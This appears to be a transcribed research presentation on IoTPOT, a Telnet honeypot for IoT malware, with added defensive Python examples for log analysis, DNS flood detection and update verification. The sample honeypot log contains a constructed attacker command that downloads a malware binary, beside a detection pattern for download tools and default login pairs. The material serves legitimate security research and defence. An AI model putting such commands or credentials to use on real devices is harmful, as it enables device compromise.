IoT Vulnerability Analysis
Koji Nakao, Distinguished Researcher
National Institute of Information and Communications Technology (NICT)
Contents
- Observing current IoT attacks with analysis
- Understanding infected IoT devices
- How to reduce infected IoT devices, including the method for curing IoT devices
- Our next actions
Scanning observation by nicter-atlas
Recently, scanning to port 23 (Telnet) has been growing sharply. Packets are captured through the darknet on a real-time basis; the colour indicates the protocol type.
[Figure: Atlas "All" view (legend: UDP, TCP SYN, TCP SYN/ACK, TCP Other, ICMP) and Atlas view of port 23 only]
Telnet (23) attacks on the darknet have rocketed
[Chart: number of unique hosts (left axis, 0 to 400,000) and number of packets (right axis, 0 to 70,000,000) over time]
Attacking hosts are IoT devices
- 150,000 attacking IPs
- 361 models observed in 4 months
Why IoT devices?
- Online 24/7
- No AV
- Weak/default login passwords
- Global IP address, open to the Internet
We would like to know...
- Malware: What kind of malware? How many different kinds?
- Targets: What IoT devices are targeted?
- Monetization: What do the attackers do after compromising these devices?
We propose the first honeypot for IoT.
Challenges
- Honeypot: IoT devices listening on Telnet. Emulating diverse IoT devices; handling the capture of malware built for different CPU architectures.
- Sandbox (IoTBOX): running IoT malware of different CPU architectures (ARM, MIPS, MIPSEL, SuperH, PPC, x86).
Emulating different devices
A device profile has three parts:
- Different banner interactions: the 3-way handshake, Telnet option negotiation (Do Echo, Do NAWS, Will Echo; NAWS = Negotiate About Window Size), then the welcome message and login prompt (e.g. "ADSL Router login:"). Banners are collected by scanning the Internet on port 23.
- Different user IDs/passwords: weak/default credentials (e.g. root / 12345), obtained by web search.
- Different command interactions/responses: the response to each command (e.g. "cat /bin/sh") differs per architecture (ARM, MIPS, PPC). Responses are learned from actual devices and from a system with a general configuration for embedded devices (e.g. OpenWRT).
IoTPOT results
During 122 days of operation (April 1 to July 31, 2015):
[Chart: unique host count (0 to 250,000) reaching each stage: Visit, Login, Download Malware]
- 900,394 malware download attempts
- Malware of 11 different CPU architectures
- 93% of downloaded binaries are new to VirusTotal (as of 2015/09)
General flow of Telnet-based malware attacks
Actors: attacker (or an already infected IoT device), DL server (malware binary and malware shell script), C&C server, and the victim IoT device.
1. Scan 23/TCP, then login attempts using a dictionary attack
2. Series of Telnet commands
3. Download malware
4. Attack command from the C&C server (e.g. DoS)
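The four-step flow above is what a Telnet honeypot actually records, so the natural defender-side processing is to reconstruct how far each source got (visit, login, download), which is the funnel IoTPOT reports. The following is an added example, not IoTPOT code; the log format ("timestamp source_ip event [detail]" with events connect, login_fail, login_ok, cmd) is hypothetical, and the log lines, IP addresses and download host are constructed.

```python
"""Reconstruct the visit -> login -> download funnel of a Telnet attack flow
from honeypot event logs, and pull out the indicators a defender acts on.

Added example (not IoTPOT code). Log format is hypothetical:
"<timestamp> <source ip> <event> [detail]" with events connect, login_fail,
login_ok and cmd. All lines, addresses and hosts below are constructed.
"""
import re
from collections import Counter

SAMPLE_LOG = """\
2015-05-01T10:00:01 198.51.100.7 connect
2015-05-01T10:00:02 198.51.100.7 login_fail root/admin
2015-05-01T10:00:03 198.51.100.7 login_ok root/12345
2015-05-01T10:00:04 198.51.100.7 cmd enable
2015-05-01T10:00:05 198.51.100.7 cmd cat /bin/sh
2015-05-01T10:00:06 198.51.100.7 cmd wget http://203.0.113.5/arm.bin
2015-05-01T10:01:00 203.0.113.9 connect
2015-05-01T10:01:01 203.0.113.9 login_fail admin/admin
2015-05-01T10:01:02 203.0.113.9 login_fail root/root
2015-05-01T10:02:00 192.0.2.44 connect
2015-05-01T10:02:01 192.0.2.44 login_ok admin/1234
2015-05-01T10:02:02 192.0.2.44 cmd cat /proc/cpuinfo
"""

STAGES = ["visit", "login", "download"]
# Commands that fetch a payload (step 3 of the flow); the URL is what to block.
DOWNLOAD_CMD = re.compile(r"^(?:busybox\s+)?(wget|tftp|curl|ftpget)\s+(.*)$")
URL_RE = re.compile(r"https?://\S+")


def parse_log(text):
    """Split each line into a dict; the detail field is optional."""
    events = []
    for line in text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue  # skip malformed lines
        ts, ip, event = parts[:3]
        detail = parts[3] if len(parts) == 4 else ""
        events.append({"ts": ts, "ip": ip, "event": event, "detail": detail})
    return events


def stage_per_source(events):
    """Deepest stage each source IP reached, keyed by IP."""
    reached = {}
    for e in events:
        if e["event"] == "connect" or e["event"] == "login_fail":
            idx = 0
        elif e["event"] == "login_ok":
            idx = 1
        elif e["event"] == "cmd":
            # Any command implies a successful login; a fetch is the download stage.
            idx = 2 if DOWNLOAD_CMD.match(e["detail"]) else 1
        else:
            continue
        reached[e["ip"]] = max(reached.get(e["ip"], 0), idx)
    return {ip: STAGES[i] for ip, i in reached.items()}


def funnel(stages):
    """Cumulative counts per stage, like the IoTPOT visit/login/download chart."""
    counts = Counter()
    for stage in stages.values():
        for s in STAGES[: STAGES.index(stage) + 1]:
            counts[s] += 1
    return dict(counts)


def download_urls(events):
    """Distinct payload URLs seen in download commands (blocklist candidates)."""
    urls = set()
    for e in events:
        if e["event"] == "cmd" and DOWNLOAD_CMD.match(e["detail"]):
            urls.update(URL_RE.findall(e["detail"]))
    return sorted(urls)


def dictionary_attackers(events, threshold=2):
    """Sources with at least `threshold` failed logins (step 1, dictionary attack)."""
    fails = Counter(e["ip"] for e in events if e["event"] == "login_fail")
    return sorted(ip for ip, n in fails.items() if n >= threshold)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print(funnel(stage_per_source(evs)), download_urls(evs), dictionary_attackers(evs))
```

The funnel is cumulative on purpose: every source that downloaded also logged in and visited, which is how the IoTPOT chart reads. The URL list and the repeated-failure list are the two outputs that feed directly into blocking and into notifying the owners of infected devices.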
Attack Example 1: DNS water torture attack
Infected devices send queries for random, non-existent subdomains (e.g. 9a3jk.cc.zmr666.com, elirjk.cc.zmr666.com, pujare.cc.zmr666.com, oiu4an.cc.zmr666.com) to the cache DNS server at the ISP. The cache holds none of these names, so every query is forwarded to the authoritative DNS for zmr666.com, which runs out of resources and replies with delay.
[Diagram: infected devices -> cache DNS server at ISP -> authoritative DNS for zmr666.com ("no resource"); delayed reply]
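The signature of this attack at the ISP resolver is a large number of distinct, random-looking leftmost labels under one zone, almost all of which fail (NXDOMAIN, or SERVFAIL once the authoritative server is exhausted). The following detector is an added example, not NICT's or any resolver's code: it works on (client, qname, rcode) tuples as a cache resolver would log them. The zmr666.com names are the ones on the slide; the other records and all client addresses are constructed, and the zone is approximated as the last two labels (no public suffix list).

```python
"""Detect a DNS water torture (random-subdomain) flood in resolver query logs.

Added example; not NICT's or a resolver's code. Input is a list of
(client, qname, rcode) tuples. The zmr666.com names are from the slide; all
other records and the client addresses are constructed. Zone = last two labels
(a simplification: no public suffix list).
"""
import math
from collections import defaultdict

SAMPLE_QUERIES = [
    ("10.0.0.11", "9a3jk.cc.zmr666.com", "NXDOMAIN"),
    ("10.0.0.12", "elirjk.cc.zmr666.com", "NXDOMAIN"),
    ("10.0.0.13", "pujare.cc.zmr666.com", "NXDOMAIN"),
    ("10.0.0.14", "oiu4an.cc.zmr666.com", "NXDOMAIN"),
    ("10.0.0.11", "x7q2lm.cc.zmr666.com", "SERVFAIL"),  # authoritative overloaded
    ("10.0.0.12", "b0qf3s.cc.zmr666.com", "SERVFAIL"),
    ("10.0.0.20", "www.example.com", "NOERROR"),         # benign baseline
    ("10.0.0.21", "www.example.com", "NOERROR"),
    ("10.0.0.22", "mail.example.com", "NOERROR"),
    ("10.0.0.23", "www.example.net", "NOERROR"),
]


def label_entropy(label):
    """Shannon entropy in bits per character of one DNS label (0.0 for empty)."""
    counts = defaultdict(int)
    for ch in label.lower():
        counts[ch] += 1
    n = len(label)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def zone_of(qname):
    """Approximate the attacked zone as the last two labels."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def summarize(queries):
    """Per zone: totals, failures, distinct leftmost labels, clients, label entropies."""
    stats = defaultdict(lambda: {"total": 0, "failed": 0, "labels": set(),
                                 "clients": set(), "entropy": []})
    for client, qname, rcode in queries:
        s = stats[zone_of(qname)]
        s["total"] += 1
        if rcode in ("NXDOMAIN", "SERVFAIL"):
            s["failed"] += 1
        first = qname.rstrip(".").split(".")[0]
        s["labels"].add(first.lower())
        s["clients"].add(client)
        s["entropy"].append(label_entropy(first))
    return stats


def flag_water_torture(queries, min_distinct=4, min_fail_ratio=0.8, min_entropy=2.0):
    """Zones whose traffic looks like a random-subdomain flood, with the evidence.

    Three conditions must hold together: many distinct leftmost labels, a high
    failure ratio, and random-looking labels (mean entropy above threshold), so
    a popular zone with a few legitimate hostnames is not flagged.
    """
    flagged = {}
    for zone, s in summarize(queries).items():
        fail_ratio = s["failed"] / s["total"]
        mean_entropy = sum(s["entropy"]) / len(s["entropy"])
        if (len(s["labels"]) >= min_distinct and fail_ratio >= min_fail_ratio
                and mean_entropy >= min_entropy):
            flagged[zone] = {
                "queries": s["total"],
                "distinct_labels": len(s["labels"]),
                "fail_ratio": round(fail_ratio, 2),
                "mean_label_entropy": round(mean_entropy, 2),
                "clients": sorted(s["clients"]),  # candidate infected devices
            }
    return flagged


if __name__ == "__main__":
    for zone, evidence in flag_water_torture(SAMPLE_QUERIES).items():
        print(zone, evidence)
```

The client list in the evidence is the useful by-product for the curing step discussed later on this page: the resolver operator learns which subscriber addresses are emitting the flood without touching the devices themselves.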
Attack Example 2: Click fraud
Infected devices imitate user clicks on advertising web sites.
Attack Example 3: Stealing credentials from PPV (pay-per-view) services
Particular set-top boxes are being targeted (such as Dreambox).
Looking back on devices visiting IoTPOT
We scan back on port 23/TCP and 80/TCP. More than 60 different types (361 models) of devices visit IoTPOT.
[Chart: number of IP addresses per device type; the two largest types have 10,734 and 4,856 addresses, followed by 1,391, 787, 430, 411, 337, 206, 206, 174, 60, 20, 19, 15, 11, 10, 10, 9, 6, 6]
Web interfaces of devices attacking us
Categorizing IoT device types without controls
- Surveillance group: IP camera, DVR
- Networking-related devices: router, gateway, modem, bridge, security appliance
- Telephone system: VoIP gateway, IP phone, GSM router, analog phone adapter
- Infrastructure: parking management system, LED display control system
- Industrial control system: solid state recorder, Internet communication module, data acquisition server, BACnet I/O module
- Personal: web camera, personal video recorder, home automation gateway
- Broadcasting facility: digital video broadcaster, digital video scaler, video encoder/decoder, set-top box
- Other: heat pump, fire alarm system, disk recording system, optical imaging facility, fingerprint scanner
ASes with more than 1,000 infected devices, by country: France, Colombia, Germany, Britain, Libya, Thailand, Israel, Italy, Philippines, Argentina, Malaysia, Mexico, Taiwan, Ukraine, Spain, China, Vietnam, Hong Kong, Brazil, USA, India, Korea, Turkey, Russia
Key findings through our challenges
Malware:
- At least 6 DDoS malware families target IoT devices via Telnet
- Malware samples of 11 different CPU architectures are captured
- 93% of samples are new to VirusTotal
- One family has quickly evolved to target more devices, with as many as 9 different CPU architectures
Targets:
- More than 60 types (361 models) of IoT devices are infected
Monetization:
- 11 types of DDoS attacks
- Scans (TCP/23, 80, 8080, 5916 and UDP/123, 3143)
- Fake web hosting
- Click fraud attacks
- Stealing credentials of PPV
Our target IoT devices
- Well-managed IoT devices controlled by IoT services (e.g. Smart+Connected City parking, lighting, traffic, location services)
- Less-controlled IoT devices ("Nora-IoT") owned by individuals
IoT management process for less-controlled devices
- ANALYSIS of IoT behaviors
- MONITORING of IoT devices
- EXECUTION of IoT security controls
- INTELLIGENCE for IoT management
Security controls for less-controlled IoT devices
1. Awareness for IoT device owners (individuals): use of appropriate IDs and passwords; a guideline.
2. IoT device vendors:
- Stop using Telnet (port 23) in newly purchased IoT devices, in order to avoid malware infections;
- Implement a module/function for updating software/firmware.
3. Less-controlled IoT devices already in use:
- Remove malware from infected IoT devices, or stop the malware from activating (deletion of registry entries, executables, or scheduler entries);
- Provide remote software update functions.
1) IoT security guideline for IoT device owners (example)
Guide 1: Be careful about the initial setting of the device: use an appropriate ID/password; close unnecessary ports.
Guide 2: When you stop using a device, switch off its power.
Guide 3: When disposing of a device, delete the data stored in it.
Guide 4: Refuse to purchase IoT devices that come without any user support from the vendor.
3) Curing IoT devices
[Diagram] An infected IoT device (A) scans port 23 and reaches the IoT honeypot, which records A's IoT fingerprint. IoT device vendors or an IoT integrated maintenance centre then cure device (A) by removing or stopping the malware.
Secure remote updates for IoT software/firmware
ITS: the general model of a networked vehicle can be an example for IoT software update.
[Diagram] Aftermarket information device supplier, and car manufacturer / garage centre -> update server / log database -> (communication path) -> vehicle: mobile gateway (head unit), on-board information device, and ECUs (power management control ECU, seat belt control ECU, driving support ECU, parking assist ECU, skid control ECU, etc.)
An example of an ITS software remote update procedure
2. Request for diagnosis of software status
3. Result of diagnosis with software status
4. Report of results for the ECUs in a vehicle
5. Receipt for submission of the diagnosis report
7. Request for update module
8. Update module is provided
10. Notification to user (driver) about updates
11. Confirmation of the update
12. Request for updates to ECUs
13. Results of updates in ECUs
14. Report of application of the update
15. Confirmation from the update server
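The security of this procedure rests on what the gateway checks at step 8 before step 12: that the update module really came from the update server, that it is a newer version than the one reported at step 3 (otherwise a captured old module could be replayed), and that the bytes received match what the server described. The following is an added example, not the procedure's reference implementation or any manufacturer's code. HMAC-SHA256 with a key pre-shared between the update server and the gateway stands in for the asymmetric signature a production scheme would use, so the code runs on the Python standard library alone; ECU names, versions, module contents and the key are all constructed.

```python
"""Gateway-side handling of a remote software update, following the ITS steps:
diagnose (3/4) -> receive module (8) -> verify -> apply to ECUs (12/13) -> report (14).

Added example, not a manufacturer's or reference implementation. HMAC-SHA256 with
a pre-shared key stands in for a real asymmetric signature so the code runs on the
standard library only. All ECU names, versions, images and the key are constructed.
"""
import hashlib
import hmac
import json

# Constructed key (hypothetical). A real gateway would hold the server's public key.
UPDATE_KEY = b"constructed-demo-key-do-not-use"


def sign_manifest(manifest, key):
    """Authenticate the manifest over a canonical JSON encoding."""
    body = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def build_update(target, version, module, key):
    """Update server (steps 7/8): the manifest binds target, version and module hash."""
    manifest = {"target": target, "version": version,
                "sha256": hashlib.sha256(module).hexdigest()}
    return manifest, sign_manifest(manifest, key), module


def diagnose(ecus):
    """Steps 3/4: report the installed software version of every ECU."""
    return {name: ecu["version"] for name, ecu in ecus.items()}


def verify_update(manifest, signature, module, installed_version, key):
    """Checks before step 12, in order: authenticity, anti-rollback, integrity."""
    if not hmac.compare_digest(sign_manifest(manifest, key), signature):
        return False, "bad signature"
    if manifest["version"] <= installed_version:
        return False, "rollback or replay"
    if hashlib.sha256(module).hexdigest() != manifest["sha256"]:
        return False, "module hash mismatch"
    return True, "ok"


def apply_updates(ecus, updates, key):
    """Steps 12-14: apply each verified update to its ECU; return per-ECU results."""
    results = {}
    for target, (manifest, signature, module) in updates.items():
        if target not in ecus or manifest["target"] != target:
            results[target] = "rejected: unknown or mismatched target"
            continue
        ok, reason = verify_update(manifest, signature, module,
                                   ecus[target]["version"], key)
        if ok:
            ecus[target]["version"] = manifest["version"]
            ecus[target]["image"] = module
            results[target] = "updated"
        else:
            results[target] = "rejected: " + reason
    return results


def demo():
    """Constructed vehicle with three ECUs and three candidate updates."""
    ecus = {
        "parking_assist": {"version": 3, "image": b"pa-v3"},
        "skid_control": {"version": 7, "image": b"sc-v7"},
        "seat_belt": {"version": 2, "image": b"sb-v2"},
    }
    report = diagnose(ecus)
    good = build_update("parking_assist", 4, b"pa-v4", UPDATE_KEY)
    # Tampered in transit: manifest and signature intact, module bytes changed.
    manifest, sig, _ = build_update("skid_control", 8, b"sc-v8", UPDATE_KEY)
    tampered = (manifest, sig, b"sc-v8-modified")
    # Replay of an older, validly signed module.
    stale = build_update("seat_belt", 1, b"sb-v1", UPDATE_KEY)
    results = apply_updates(ecus, {"parking_assist": good,
                                   "skid_control": tampered,
                                   "seat_belt": stale}, UPDATE_KEY)
    return report, results, ecus


if __name__ == "__main__":
    print(demo()[1])
```

Two design points carry over to any IoT update path: the version used for the anti-rollback check is the one the gateway read from the ECU at step 3, not one the server asserts, and the hash is checked over the bytes actually received, after the signature on the manifest has been verified, so a tampered module is rejected before anything is written to the ECU.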
Our next actions
1. Cyber-security information captured by our IoT honeypot should be correctly and appropriately shared with the right stakeholders;
2. Remote curing methods should be technologically investigated;
3. IoT software and firmware update methods and procedures should be investigated, designed and evaluated;
4. Support the development of IoT security guidelines for IoT device owners, IoT service providers and IoT device developers.